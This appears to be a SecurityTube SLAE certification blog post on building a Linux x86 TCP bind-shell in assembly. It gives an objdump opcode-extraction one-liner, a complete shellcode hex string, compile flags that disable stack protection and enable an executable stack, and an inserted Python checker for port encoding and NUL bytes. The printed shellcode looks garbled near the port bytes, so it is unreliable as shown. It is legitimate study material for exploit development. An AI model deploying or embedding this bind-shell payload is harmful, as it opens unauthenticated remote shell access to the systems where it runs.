SLAE Assignment #1 – Shell_Bind_TCP Shellcode

Files available on GitHub

  1. Assignment1.nasm
  2. compile.sh
  3. shconfig.py
  4. shellcode.c

In this assignment, I wrote the bind shell in assembly using the socketcall() system call and redirected STDIN, STDOUT, and STDERR to the resulting socket. Using some cut and trim magic learned via commandlinefu, the opcodes were pasted into the shconfig.py program, which is run with an argument specifying the port to listen on. That output is put into the shellcode.c skeleton program, which is compiled with stack protection disabled and an executable stack.

Here’s the trim command to extract the opcodes:

objdump -d ./shell_bind_tcp|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Step 1: Compile Assignment1.nasm

Step 2: Extract the opcodes

Run shconfig.py -p <port number of choice>

./shconfig.py -p 1337
Shellcode : "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1
\xcd\x80\x31\xff\x97\x6a\x66\x58\x6a\x02\x5b\x31\xc9\x51\x66\x68\x53\x9
\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x31\xc9
\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x31\xc9\x51\x51\x57\x89\xe1\xcd
\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x31\xc9\x51
\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80";

Insert that output into code[] variable of the skeleton C program.

Compile with:

gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

Run it, then connect from another terminal with netcat to the port you specified with shconfig.py, and you're in!
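Before pasting the generated string into code[], it is worth checking it the way a reviewer would: the port must be in network byte order, and neither the port nor any other byte may be a NUL, or the C string copy silently stops early. The following is an added example and not the shconfig.py from this post; it assumes the port is pushed with the 16-bit push word opcode (66 68 imm16) and reads the first such occurrence, and the sample strings are constructed fragments covering only the bind() setup.

```python
import re
import struct

# 66 68 imm16: "push word", the instruction used to put the port on the stack
PUSHW_IMM16 = b"\x66\x68"

# Constructed fragments in the format shconfig.py prints (not the full shellcode)
SAMPLE_1337 = r'"\x31\xc9\x51\x66\x68\x05\x39\x66\x53\x89\xe1";'   # port 1337 = 0x0539
SAMPLE_80 = r'"\x31\xc9\x51\x66\x68\x00\x50\x66\x53\x89\xe1";'     # port 80 = 0x0050


def decode_hex_string(s):
    """Turn the "\\x6a\\x66..." text into raw bytes, rejecting garbled escapes."""
    body = s.strip().replace("\n", "").strip('";')
    parts = re.findall(r"\\x([0-9a-fA-F]{2})", body)
    # Every escape is exactly four characters; anything else means a mangled byte
    if len(body) != 4 * len(parts):
        raise ValueError("malformed \\x escape in shellcode string")
    return bytes(int(p, 16) for p in parts)


def port_bytes(port):
    """16-bit port in network (big-endian) order, as sockaddr_in.sin_port expects."""
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    return struct.pack(">H", port)


def check_shellcode(s, port):
    """Report length, NUL bytes and whether the embedded port matches the requested one."""
    sc = decode_hex_string(s)
    problems = []
    nul = [i for i, b in enumerate(sc) if b == 0]
    if nul:
        problems.append(f"NUL byte(s) at offset(s) {nul}: a C string copy stops early")
    idx = sc.find(PUSHW_IMM16)
    if idx < 0 or idx + 4 > len(sc):
        problems.append("no 'push word' carrying the port was found")
    else:
        embedded = sc[idx + 2:idx + 4]
        if embedded != port_bytes(port):
            found = struct.unpack(">H", embedded)[0]
            problems.append(f"embedded port is {found}, expected {port}")
    return {"length": len(sc), "problems": problems}


if __name__ == "__main__":
    for sample, port in ((SAMPLE_1337, 1337), (SAMPLE_80, 80)):
        print(port, check_shellcode(sample, port))
```

Port 80 is the instructive case: its high byte is 0x00, so the string is cut off inside the bind() setup and nothing after it ever runs.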


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID:  SLAE-860
